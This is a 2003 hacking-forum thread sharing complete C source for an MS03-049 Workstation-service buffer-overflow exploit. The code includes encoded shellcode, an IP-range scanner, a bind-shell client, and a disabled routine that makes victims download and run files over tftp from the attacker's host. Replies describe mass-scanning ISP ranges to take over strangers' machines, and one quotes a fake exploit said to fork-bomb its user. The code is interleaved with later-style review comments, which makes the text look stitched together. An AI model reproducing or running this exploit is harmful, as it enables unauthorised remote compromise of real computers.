
Full Version: Ms03-049 Recode
slynx
Okay, this is simply my personal recode of the wkssvc.dll (Workstation service, MS03-049) overflow exploit. Given an IP range or a single target it will do the following:

[1] Ping host
[2] Scan port 139 if ping OK
[3] If port 139 open, attack
[4] If exploit success, drop to shell

QUOTE

[+] ms03-049 wkksvc.dll buffer overflow - exploit recode
[+] Starting ping scan from 10.15.8.24 to 10.15.8.24 ...
[+] 10.15.8.24 appears to be up ... scanning port 139 ...
[+] Found port 139 open for connections on 10.15.8.24 ...
[+] Connection socket will sleep for four seconds ...
[+] Attacking remote host 10.15.8.24 ...

Local name       
Remote name      \\10.15.8.24\ipc$
Resource type    IPC
Status            Disconnected
# Opens          0
# Connections    18
The command completed successfully.

[+] GetProcAddr: 71c5679e
[+] Sending exploit to 10.15.8.24 ...
[+] Connection socket initialized ...
[+] Trying to connect to 10.15.8.24:4444 ...
[+] Connected to bindshell on 10.15.8.24:4444 ...
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp. 
C:\WINNT\system32>exit
[+] Closing socket and cleaning up ...
[+] Scanning completed ... closing program ...


QUOTE

#include <windows.h>
#include <winbase.h>
#include <lm.h>
#include "LMJoin.h"
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include "CPing.h"
#include <stdlib.h>
#include <process.h>
#include <io.h>
#include <iostream>
#include <ctime>
#include <cstdlib>

using namespace std;

#pragma comment(lib, "ws2_32")
#pragma comment(lib, "mpr")

/* Forward declarations for the helpers defined further down. */
long  gimmeip(char *hostname);             /* dotted quad / host name -> network-order IPv4 address */
void  scanip(char *startip, char *endip);  /* ping + TCP/139 sweep of an inclusive address range */
void  gotoshell(void);                     /* connect to the bind shell on targetiptmp:4444 */
void  doshell(int sock);                   /* relay local stdin/stdout to a connected socket */

/* Declared here but not referenced anywhere else in this listing. */
SERVICE_STATUS          ServiceStatus;
SERVICE_STATUS_HANDLE  hStatus;

/*
 * Current target, shared between scanip() (writer) and SploitThread() /
 * gotoshell() (readers).  scanip() stores the pointer returned by
 * inet_ntoa(), i.e. a static buffer that the next inet_ntoa() call
 * overwrites, so the value is only meaningful while scanip() is blocked
 * in gotoshell().  NOTE(review): nothing synchronises access to it.
 */
char *targetiptmp;

/*
 * Call signature used for NetAddAlternateComputerName(), which
 * SploitThread() resolves from netapi32.dll at run time.  The typedef
 * declares a VOID return, so whatever status the call produces is
 * discarded at the call site.
 */
typedef VOID (*MYPROC)(IN  LPCWSTR Server OPTIONAL,
    IN  LPCWSTR AlternateName,
    IN  LPCWSTR DomainAccount OPTIONAL,
    IN  LPCWSTR DomainAccountPassword OPTIONAL,
    IN  ULONG Reserved
    );
/*
 * Program entry point.
 *
 * argv[1] is the first address to scan; argv[2], when present, is the
 * last.  With a single argument the range is just that one host.  The
 * sweep itself lives in scanip(); this function only validates the
 * argument count and prints the banners.
 *
 * Returns 1 on a usage error, 0 once the sweep has finished.
 */
int main(int argc, char **argv) {

if (argc < 2) {
  fprintf(stderr, "\n[+] ms03-049 wkksvc.dll buffer overflow <exploit only>\n");
  fprintf(stderr, "[+] this is private copy ... and requires a large towel :)\n");
  fprintf(stderr, "[+] usage = %s <start ip> [end ip]\n", argv[0]);
  return 1;
}

printf("\n[+] ms03-049 wkksvc.dll buffer overflow - exploit recode\n");

/* A missing end address collapses the range to the start address. */
char *first = argv[1];
char *last = (argc >= 3) ? argv[2] : argv[1];
scanip(first, last);

printf("[+] Scanning completed ... closing program ... \n");
return 0;
}
//*/
/*
 * Thread body started by scanip() for one target.  lpParam is never
 * read; the target address comes from the global targetiptmp.
 *
 * What the code does, in order:
 *   1. runs `net use` against \\target\ipc$ through system();
 *   2. builds exp_buf = 2000 x 'A' + 44 x 0x90 + jmpesp + 16 x 0x90 + sc;
 *   3. widens exp_buf into `unicode` by interleaving a 0x00 after each byte;
 *   4. resolves NetAddAlternateComputerName from netapi32.dll and calls
 *      it with \\target as Server and the widened buffer as AlternateName.
 * Nothing in this listing shows what the remote side does with the call;
 * the bind-shell connect is attempted separately by gotoshell().
 *
 * Defects are annotated inline below; the code itself is unchanged.
 */
DWORD WINAPI SploitThread( LPVOID lpParam )
{
char overwrite[2045] = "";
/* sc: the first 17 bytes are an XOR decoder (jmp/pop esi, ecx = 0x77
   dwords, xor [esi] with 0x9432bf80, esi += 4, loop); the rest is the
   encoded payload.  Treated as opaque here. */
char sc[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
  "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
  "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
  "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
  "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
  "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
  "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
  "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
  "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
  "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
  "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
  "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
  "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
  "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
  "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
  "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
  "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
  "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
  "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
  "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
  "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
  "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
  "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
  "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
  "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
  "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
  "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
  "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
  "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
  "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
  "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
  "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";

/* 2045+4+16+501: filler + jmpesp + NOP pad + sc (501 is sized for
   sizeof(sc), which includes sc's terminating NUL). */
char exp_buf[2045+4+16+501];
char ip[30];
char netuse[100];
char *targetip = targetiptmp;
/* NOTE(review): declared as 60 *pointers* but used as a 60-WCHAR output
   buffer for MultiByteToWideChar() below.  It happens to be large
   enough; the type is simply wrong. */
LPWSTR ipl[60];
/* Return address written over the saved EIP; hard-coded for one build
   of Windows XP (the thread does not tell which). */
DWORD jmpesp = 0x7518A747;
char unicode[(2045+4+16+501)*2];
int i = 0;
int x = 0;
int len = 0;
HINSTANCE hinstLib;
    MYPROC ProcAddr;
    BOOL fFreeResult, fRunTimeLinkSuccess = FALSE;

printf("[+] Attacking remote host %s ...\n",targetip);

/* NOTE(review): adjacent string literals are concatenated by the
   compiler, so the command actually run is
       net use \\<ip>\ipc$  /u:
   -- the quoted empty user name and password the author intended never
   reach the shell.  system() on a formatted command is also a pattern
   to avoid; it is only safe here because the variable part is a dotted
   quad produced by inet_ntoa(). */
sprintf(netuse,"net use \\\\%s\\ipc$ "" /u:""",targetip);

/* NOTE(review): the format consumes no arguments, so netuse is never
   printed; this only emits a newline. */
printf("\n",netuse);

system(netuse);

/* Form "\\<ip>".  _snprintf() does not guarantee NUL-termination on
   truncation, but a dotted quad plus the prefix is at most 17 bytes, so
   the 24-byte limit is never hit in practice. */
_snprintf(ip, 24, "\\\\%s", targetip);
hinstLib = LoadLibrary("netapi32.dll");

/* Payload layout in exp_buf:
     [0,2000)     'A' filler
     [2000,2044)  0x90 (44 bytes)
     [2044,2048)  jmpesp (saved return address)
     [2048,2064)  0x90 (16 bytes)
     [2064,...)   sc, including its NUL terminator                       */
memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &jmpesp, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));
memset(unicode, 0x00, sizeof(unicode));
/* Interleave a 0x00 after every byte (a crude UTF-16LE widening).
   NOTE(review): the bound is off by one -- `<=` lets the final
   iteration write unicode[sizeof(unicode)] and read
   exp_buf[sizeof(exp_buf)], both one past the end of their arrays.
   It should be `i < sizeof(unicode)`. */
for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) {
unicode[i] = exp_buf[x];
}
/* NOTE(review): 30 is the full size of ip[], not the length of the
   string in it, so uninitialised bytes after the NUL are converted too.
   The return value is not checked. */
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);

if (hinstLib != NULL) {
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr) {
  fRunTimeLinkSuccess = TRUE;

  /* NOTE(review): *ProcAddr is a function designator; printing it with
     %x is a type mismatch (it shows the low bits of the pointer). */
  printf("[+] GetProcAddr: %x\n", *ProcAddr);
  printf("[+] Sending exploit to %s ...\n", targetip);
 
  /* Server = \\<ip>, AlternateName = the widened payload.  The status
     the API returns is thrown away because MYPROC is typedef'd VOID. */
  (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);

  } else {

  printf("\n[x] The value of procaddr is null !\n");

  }
        fFreeResult = FreeLibrary(hinstLib);
    } else {

printf("[x] The value of hinst is null !\n");

}
/* ExitThread() never returns; the `return 1` below is unreachable. */
ExitThread(0);
return 1;
}
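/*
 * Resolve hostname -- a dotted quad or a DNS name -- to an IPv4 address
 * in network byte order.
 *
 * Returns the address on success.  On failure it prints a diagnostic
 * and returns 0, which is what the old `return NULL` produced as well;
 * callers must treat 0 as "no address" (0.0.0.0 is never a usable
 * target here).
 *
 * Fixes: inet_addr() returns an unsigned value whose failure sentinel is
 * INADDR_NONE; the old `< 0` test on a signed long sent every address
 * whose last octet was >= 128 through gethostbyname() and relied on the
 * resolver accepting numeric strings.  The resolver path now also checks
 * the address family and length before copying, and the function no
 * longer calls WSACleanup() on failure -- tearing Winsock down from
 * inside a lookup helper left the caller's sockets unusable.
 */
long gimmeip(char *hostname)
{
unsigned long addr = inet_addr(hostname);

if (addr == INADDR_NONE) {
  struct hostent *he = gethostbyname(hostname);
  if (he == NULL || he->h_addrtype != AF_INET || he->h_length > (int)sizeof(addr)) {
  printf("[x] Failed to resolve host: %s ... \n\n",hostname);
  return 0;
  }
  addr = 0;   /* clear first: h_length may be shorter than sizeof(addr) */
  memcpy(&addr, he->h_addr, he->h_length);
}
return (long)addr;
}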
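/*
 * Probe a single host (hostaddr in host byte order): ping it, then try
 * a TCP connect to port 139.  When both succeed, publish the address in
 * targetiptmp, start SploitThread() and block in gotoshell() until the
 * remote shell session ends.  thrdparam is handed to the thread as-is.
 */
static void probe_and_attack(unsigned long hostaddr, CPing &ping, DWORD *thrdparam)
{
SOCKADDR_IN host;
memset(&host, 0, sizeof(host));
host.sin_family = AF_INET;
host.sin_port = htons(139);
host.sin_addr.s_addr = htonl(hostaddr);

/* inet_ntoa() hands back a static buffer that the next call overwrites,
   so targetiptmp (set below) only stays valid while this thread is
   blocked in gotoshell(). */
char *curtarget = inet_ntoa(host.sin_addr);

if (!ping.Ping(curtarget)) {
printf("[x] %s does not appear to be up ...\n",curtarget);
return;
}
printf("[+] %s appears to be up ... scanning port 139 ...\n",curtarget);

SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == INVALID_SOCKET) {
printf("[x] Could not create a probe socket for %s ...\n", curtarget);
return;
}
int rc = connect(sock, (SOCKADDR *)&host, sizeof(host));
closesocket(sock);   /* the probe socket is never reused: close it on every path */

if (rc == SOCKET_ERROR) {
printf("[x] Port 139 is closed or filtered on %s ...\n", curtarget);
return;
}
printf("[+] Found port 139 open for connections on %s ...\n", curtarget);

targetiptmp = curtarget;
DWORD threadid = 0;
HANDLE hthread = CreateThread(NULL, 0, SploitThread, thrdparam, 0, &threadid);
if (hthread == NULL) {
printf("[x] Could not start the exploit thread for %s ...\n", curtarget);
return;
}
CloseHandle(hthread);   /* the thread is never joined; drop the handle so it does not leak per host */
gotoshell();
}

/*
 * Sweep the inclusive range [startip, endip] (dotted quads), running
 * probe_and_attack() against every address in it.
 *
 * Fixes over the original: both inet_addr() results and WSAStartup()
 * are checked instead of assumed; the probe socket used to leak on every
 * host that did not answer the ping and the thread handle leaked on
 * every attacked host; WSAStartup() is now balanced by WSACleanup();
 * and a range ending at 255.255.255.255 no longer loops forever because
 * the counter wrapped.
 */
void scanip(char *startip, char *endip)
{
unsigned long start = inet_addr(startip);
unsigned long end = inet_addr(endip);
if (start == INADDR_NONE || end == INADDR_NONE) {
printf("[x] Bad address range %s - %s ...\n", startip, endip);
return;
}

CPing ping;
WSADATA wsaData;
if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
printf("[x] WSAStartup failed ...\n");
return;
}

printf("[+] Starting ping scan from %s to %s ...\n",startip,endip);

DWORD dwThrdParam = 1;   /* passed to SploitThread(), which ignores it */
unsigned long counter = ntohl(start);
const unsigned long last = ntohl(end);
while (counter <= last) {
probe_and_attack(counter, ping, &dwThrdParam);
if (counter == last) {
break;   /* explicit stop: counter++ would wrap when last is 0xFFFFFFFF */
}
counter++;
}

WSACleanup();
}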
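/*
 * Connect to the bind shell expected on targetiptmp:4444 and hand the
 * connection to doshell() for interactive use.  Waits four seconds first
 * so the exploit thread has time to deliver its payload.
 *
 * Fixes over the original: SOCKET is unsigned, so the old `< 0` test on
 * an int could never detect a failed socket(); the socket was leaked
 * when connect() failed; a failed gimmeip() (which returns 0) used to
 * fall through to a connect() against 0.0.0.0.
 */
void gotoshell(void)
{
WSADATA wsdata;
char *targetip = targetiptmp;
const unsigned short port = 4444;

printf("[+] Connection socket will sleep for four seconds ... \n");

Sleep(4000);

if (WSAStartup(MAKEWORD(2,0),&wsdata)!=0) {
  printf("[x] Startup error in the connection socket ... \n");
  return;   /* nothing was initialised, so there is nothing to clean up */
}

SOCKET sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock == INVALID_SOCKET) {
  printf("[x] Connection socket not initialized ...\n");
  WSACleanup();
  return;
}

printf("[+] Connection socket initialized ...\n");

unsigned long daip = (unsigned long)gimmeip(targetip);
if (daip == 0) {
  printf("[x] Could not resolve %s ...\n", targetip);
  closesocket(sock);
  WSACleanup();
  return;
}

struct sockaddr_in target;
memset(&target, 0, sizeof(target));
target.sin_family=AF_INET;
target.sin_addr.s_addr = daip;
target.sin_port=htons(port);

printf("[+] Trying to connect to %s:%d ...\n",targetip,port);

if(connect(sock,(struct sockaddr *)&target, sizeof(target))!=0) {
  printf("[x] Connect to bindshell on %s:%d failed ...\n", targetip, port);
  closesocket(sock);   /* previously leaked on this path */
  WSACleanup();
  return;
}

printf("[+] Connected to bindshell on %s:%d ...\n", targetip, port);

doshell((int)sock);

printf("[+] Closing socket and cleaning up ...\n");

closesocket(sock);
WSACleanup();
}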
/*
void doautohack(int sock)
{
char cmd1[150];
char cmd2[150];
char cmd3[150];
char cmd4[150];
char cmd5[150];
char tmp[512];
char locn[255];
char *locip;
gethostname(locn, 255);
locip = inet_ntoa(*(struct in_addr *)*gethostbyname(locn)->h_addr_list);
Sleep(5000);
    sprintf(cmd1, "tftp -i %s get file1.exe", locip);
    sprintf(cmd2, "\r\ntftp -i %s get file2.exe", locip);
    sprintf(cmd3, "\r\ntftp -i %s get file3.exe", locip);
    sprintf(cmd5, "\r\ntftp -i %s get file4.bat", locip);
sprintf(cmd4, "\r\nfile4.bat.bat");
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd1);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd2);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd3);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd5);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
memset(tmp,'\0',sizeof(tmp));
strcpy(tmp,cmd4);
strcat(tmp,"\r\n");
send(sock,tmp,sizeof(tmp),0);
Sleep(9000);
send(sock,"\n",sizeof("\n"),0);
Sleep(500);
return;
}
//*/
//*
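/*
 * Interactive relay between the local console and a connected socket.
 *
 * Each pass waits up to one second for the socket to become readable.
 * If it does, whatever arrived is copied to stdout; otherwise one read
 * from stdin is sent to the socket.  Returns when either side closes,
 * on a socket or console error, or after the user types a line that
 * starts with "exit" (the line is sent first so the remote side sees
 * it too).
 *
 * Fixes over the original: the socket used to be smuggled into select()
 * through an `unsigned long[2]` laid out like a 32-bit Winsock fd_set;
 * a real fd_set with FD_ZERO/FD_SET does the same job without depending
 * on sizeof(SOCKET) == sizeof(unsigned long).  The timeval was named
 * `time`, shadowing time().  A select() error now ends the session
 * instead of falling through to a blocking console read.
 */
void doshell(int sock) {
  char buf[512];
  SOCKET s = (SOCKET)sock;

  for (;;) {
    fd_set readable;
    FD_ZERO(&readable);
    FD_SET(s, &readable);

    struct timeval tv;   /* rebuilt every pass: some stacks modify it */
    tv.tv_sec = 1;
    tv.tv_usec = 0;

    int ready = select(0, &readable, NULL, NULL, &tv);   /* first arg is ignored on Winsock */
    if (ready == SOCKET_ERROR) {
      return;
    }

    if (ready == 1) {
      int n = recv(s, buf, sizeof(buf), 0);
      if (n <= 0) {
        return;   /* peer closed or recv failed */
      }
      if (write(1, buf, n) <= 0) {
        return;
      }
      continue;
    }

    /* Timed out with nothing from the peer: forward one chunk of input. */
    int n = read(0, buf, sizeof(buf));
    if (n <= 0) {
      return;
    }
    int sent = send(s, buf, n, 0);
    if (strncmp(buf, "exit", strlen("exit")) == 0) {
      return;   /* "exit" was just forwarded; leave the loop ourselves too */
    }
    if (sent <= 0) {
      return;
    }
  }
}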
//*/


Attached is a zip with the full source + headers and a standalone binary w/o autohack enabled.

It's not much and there aren't any comments... just someone else's exploit with some add-ins from others and myself.

~ slynx
[slynx(at)hackit.us]# hackit.us

net
norton found "Bloodhound.Exploit" on this one......

is this a virus now or does it only mean the exploit which would be harmless to me.. ?
slynx
the attached zip only contains the same source as posted w/ header files and the very same compiled .exe

i have no idea why norton would detect bloodhound in this....but it prob. has something to do with the shell code in the sploit
net
Bloodhound is Symantec's heuristic detection family: it matches suspicious code patterns rather than a known-virus signature, so it is most likely reacting to the embedded shellcode in the binary. That is expected for any compiled exploit, but it is not evidence either way about whether the archive contains more than what was posted; scanning the zip and building from the posted source yourself is the safer route.
ducky
I'm gonna check it out...Good work m8 thanks for sharing this rolleyes.gif
UnDeRTaKeR
Great JoB M8, going to have a look!
Nick
i look it just right now

thxs
jjoao
Well, it's a nice share eitherway. Thanks on the effort. Apreciated. Even though it's always better to scan b4 wink.gif
WeeDMoNKeY
well made, junk liek this make sme want to learn cpp
i doubt its a virus due to this

http://www.symantec.com/avcenter/venc/data....exploit.4.html

any possible way we can use this from a list of alreayd scanned p: 139 puters?

another edit: to bad everyone patched to sp1 :< we need a sploit for sp1 biggrin.gif
haxor2k3
This shit really rocks smile.gif)
slynx
I forgot who mentioned it, but port 139 is blocked by most ISPs, so this exploit will work fine on your own network; I have not been able to test any remote machines yet.

on my network however i have tested this sploit on winxp sp0 and sp1 and it works just fine. i have yet to test win2k....
WeeDMoNKeY
i doubt this works for sp1... cause im scnnaing a range w/ sp1 machines (and ive got it with the old 0349 one) with sp0. So unless someone found a way to h4x sp1 ones ohmy.gif
slynx
it works....the box i sploited for the console output is sp1 >; )
admittedly it does not work on all sp1 though....but then again no sploit it perfect....
WeeDMoNKeY
ah, well then, i dunno im kind of doubtful, ill do some tests and wells ee what happens :>

i used my old method and founda machine that was vuln w.sp0 tried ur prog, and it was a fail.

first thing i notice also is the fact that it does the things in the wrong order
it shodul be exploit net use then nc

but it does liek net use exp then nc

it doesnt work.. which makes me wonder....

/me packet sniffs.
pita
nice code smile.gif i will look this.

Thanks to you.

Just to say in the russian exploit for win xp we could see that they r using the
mbstowcs() function on the unicode long string so maybe add this function on this code too to make it work with xp sp1 (i didn't test this but its from the code)
slynx
Keep this in mind: after one successful exploitation of a machine you cannot exploit that same machine again until it reboots. The overflow crashes the Workstation service and the bind shell's listening port is never fully released, so what happens is this:

exploit goes fine, connect to bindshell
decide that your done for now and close your connection

try to exploit that same machine again
the sploit says it is sending the overflow + shellcode, then tries to connect to the bindshell.....
the sploit really failed as the workstation service is hung up already from the last sploit, but the old bindshell from the successful sploit is still there (kinda...)
so you connect to the old bindshell, although it is no longer a bindshell...after you close the connection the instance of cmd that was bound to that port also closes, but the port doesn't.....

so you end up with a connection you can send things to but get nothing back....

this is the same kind of thing with the MS03-026 sploit....it really only works once then you essentially lock yourself out of that machine after you close the original bindshell....but when the system restarts....so does the workstation service and everything else, and port 4444 is no longer bound to something that's gone....

sorry about my explanation....i tried.....

anyway in my tests i used 2 differant boxes that i continually restarted after each sploit attempt....

i just pass this on as i have no problem sploiting sp1 with the same sploit posted here.....

hehe....sploit sounds funny when reduntant smile.gif
WeeDMoNKeY
aye, i foudn that out awhile ago after i closed hte shell and lost a machine, well, ive scanned 2 cable ranges with ur exploit, and it doesnt work worth jack, and i scanned 2 different cable ones, and got 10 (via my own bats etc). so eitehr the fact that unless there was no computer, which i highly doubt, or it doesnt work. And im still concerned about the order it goes in. itshouldnt go
net use exploit connect
should be
exploit net use sploit
?
flame
Slynx - your the man
------------------------
nice to see some young talents among our community
keep up the good work and just shout if ya need anything.

cool.gif

p.s whats that representing ?
System error 53 has occurred.

The network path was not found.
WeeDMoNKeY
roofle... `net use \\ip.ip.ip.ip\IPC$ "" /u:""` opens a null session: it logs you in to the IPC$ share with a blank user name and a blank password. "System error 53 / The network path was not found" means Windows could not reach that host over SMB at all, so nothing after that line in the run had a session to work with.

anyone actually get a machine?

BESIDES slynx ?

im not hating on you slynx jsut wondering why i cant get ANY after 3 or 4 thousand ip's.
Axl
nice code indeed..

but it looks as if it works only with xp sp0 and not anything else(2k) sad.gif

am i right ?
assom
I tested on windows XP sp1 , Windows 2000 SP3 , null session is ok, but no shell no problem for the other side.
DJVASTVASTY2K
QUOTE (WeeDMoNKeY @ Dec 14 2003, 10:17 PM)
well made, junk liek this make sme want to learn cpp
i doubt its a virus due to this

http://www.symantec.com/avcenter/venc/data....exploit.4.html

any possible way we can use this from a list of alreayd scanned p: 139 puters?

another edit: to bad everyone patched to sp1 :< we need a sploit for sp1 biggrin.gif

Hello M8's

Thanks For This New Ploit "Slynx"

Works Locally wink.gif

Just Gotta Try Remotely Yet, I Will post my finding on this after I have tested on some several machines.

@WeeDMoNKeY

Well Spotted on The Symantec

It's good to see that some people actually do a bit of research about the sploit and not just say [THANKS] and Spam It the Board with a single word phrase.

When someone mentioned VIRI you did a bit of research and found out all about it and that it was not a VIRI but infact used some part of the code and thats what Nortons picked up.

Well Done

But Thank You Slynx for this new Ploit wink.gif

Best Regards

Adam

Vast Gsm
neb
Oh yeah this is a real good code biggrin.gif
Uli
will test it thanks
DaMan
very usefull thanks
teest
thanks, I just testing smile.gif
T-BoNe
would love to see any proof that its working from someone smile.gif

but hell of a job dude !
slynx
WeeDMoNKeY; its always good to have a critic...where would the fun be if i didn't? in anycase i would greatly appreciate any ideas or modifications on your part, besides, we're supposed to work together....no more fighting >; )

i really don't know why you are unable to get a shell on any sp1 boxes...again i would just like to say tho that i am only testing this on a local network (10.15.x.x) and i have not tried anything other than that...

if anyone has any suggestions on how this can be improved PLEASE SUBMIT!

thanks every1 =)
WeeDMoNKeY
aight, no more fighting ;D i was just PRODDING ;D I have now tested it on sp1 (for sure machine) a friend who goes to school with me. Uhm, i think if you got the exploit from here (the code only allows sp0 to work) then we wont get sp1. Also, i still havent got any and ive scanned over 5000 pcs now (left it over night and all day) and have yet to have one, while with the other one, i start it, jerk off to some porn ;> :> and come back and i have a machine. So idunno? (well made thoguh i ahve to admit, good code (im learning c++ as we speak, via school)).

A suggestion would be to allow the exploit to recieve ips from a list. (ones with 139 already scanned) cause scan1000 works 100000 times better than this scanner. And set the order of the exploit being sent so it doesnt scare me biggrin.gif biggrin.gif biggrin.gif. other than that, need anything feel free to pm me slynx.
flame
QUOTE (T-BoNe @ Dec 15 2003, 10:29 PM)
would love to see any proof that its working from someone smile.gif

but hell of a job dude !

take my word
it works .
im planning some slight modifications now.
thanks again slynx (call me) biggrin.gif
wlingard
OK...

Slynx.. great code man... really nice.. so a BIG thanks for that! wink.gif

Here's my findings...

Works internally on my network here every time against Sp1..but remotely
it hardly works.. not sure why but that's the case. I have had 2 remote shells (on
Sp1, both) but they were after some serious number crunching, if ya know what I
mean! rolleyes.gif And since then it hasn't worked again so maybe I was just lucky!

Anyways I'm yet to see a decent remotely working version of this exploit.. yet
it seems it can work remotely on occasion so I'm not sure where it's going wrong.
Are the offsets u are using universal or EN only? My knowledge of coding C++ is
also very shite at best... I'm great with web code but little else atm! biggrin.gif

As for the suggestions put forward by WeeDMoNKeY (great name man).. I gotta
agree.. taking input from a text file would be good.. I just knocked up a .bat
to deal with that but would be nice if the exploit worked on more machines.

Anyways thanks for sharing ya code man.. not often seen so it's well appreciated!! smile.gif

//WL
WeeDMoNKeY
QUOTE (wlingard @ Dec 16 2003, 12:10 AM)
OK...

Slynx.. great code man... really nice.. so a BIG thanks for that! wink.gif

Here's my findings...

Works internally on my network here every time against Sp1..but remotely
it hardly works.. not sure why but that's the case. I have had 2 remote shells (on
Sp1, both) but they were after some serious number crunching, if ya know what I
mean! rolleyes.gif And since then it hasn't worked again so maybe I was just lucky!

Anyways I'm yet to see a decent remotely working version of this exploit.. yet
it seems it can work remotely on occasion so I'm not sure where it's going wrong.
Are the offsets u are using universal or EN only? My knowledge of coding C++ is
also very shite at best... I'm great with web code but little else atm! biggrin.gif

As for the suggestions put forward by WeeDMoNKeY (great name man).. I gotta
agree.. taking input from a text file would be good.. I just knocked up a .bat
to deal with that but would be nice if the exploit worked on more machines.

Anyways thanks for sharing ya code man.. not often seen so it's well appreciated!! smile.gif

//WL

hmm, maybe youve been talkign it works sp1 LOCALLY, because ive never tried it locally. Ive been speaking remotley, but i figured that you had meant remote... NEVER works on sp1 for me, or even sp0 :< i jsut use the odl one and run a few bats,sucks balls, ill keep scanning with this all night and morn, and ill see if i can nab one (maybe by random chance ive got 0)
WeeDMoNKeY
OKAY FOLKS THIS WORKS!!!!!!!!!!!111 /me bows down. It works quite well, id unno why iw as never able to get any machines, mustve been bad luck. (ive got one so ill keep going)

/me shuts mouth :>

works soooooo slow though, ill stick to my old method for now, unless someone *cough* wants uplaod a bat so i can take it out ofa file (im to lazy to make :< )
pipes
yerp yep yep yep...

Hackit.us? You awake still?

http://www.hackit.us/main/exploits/apache1327.c

/* :: PRIVATE - DO NOT DISTRIBUTE ::
* Apache/1.3.27 - Remote Root Exploit
* Knights of the Eastern Calculus (info_at_koec.org)
*/


with shellcode....

/*
 * Quoted from the "Apache/1.3.27 remote root exploit" that circulated
 * in 2003 (see the Full-Disclosure link below).  NOTE(review): decoded
 * by hand, this is not a shell-spawning payload.  The opening bytes
 * push ASCII text onto the stack and call write() (`\xb0\x04\xcd\x80`),
 * then sit in a loop of fork() (`\xb8\x02\x00\x00\x00\xcd\x80` followed
 * by the backward jump `\xeb\xf7`): it prints a taunt and fork-bombs
 * the machine that runs it.  Kept here only as a reference for the
 * warning in this thread -- do not build or run it.
 */
